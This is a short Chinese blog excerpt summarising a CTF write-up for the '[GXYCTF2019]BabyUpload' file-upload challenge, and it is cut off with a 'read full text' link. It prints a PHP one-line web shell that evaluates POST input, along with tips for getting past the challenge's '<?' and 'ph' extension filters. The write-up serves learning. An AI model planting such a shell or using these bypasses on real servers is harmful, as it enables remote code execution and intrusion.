2022年1月15日
[GXYCTF2019]BabyUpload
摘要: CTF小白试图写一些细到极致的wp来给健忘的自己看_(:з」∠)_ 看到上传文件就刨出了一句话木马: <script language="php">eval($_POST['a']);</script> 顺便绕过了<?过滤,歪打正着了属于是 然后发现文件后缀名还过滤了ph,改成png啥的都ok 直接 阅读全文
posted @ 2022-01-15 22:18 AntennaZ 阅读(672) 评论(0) 推荐(0)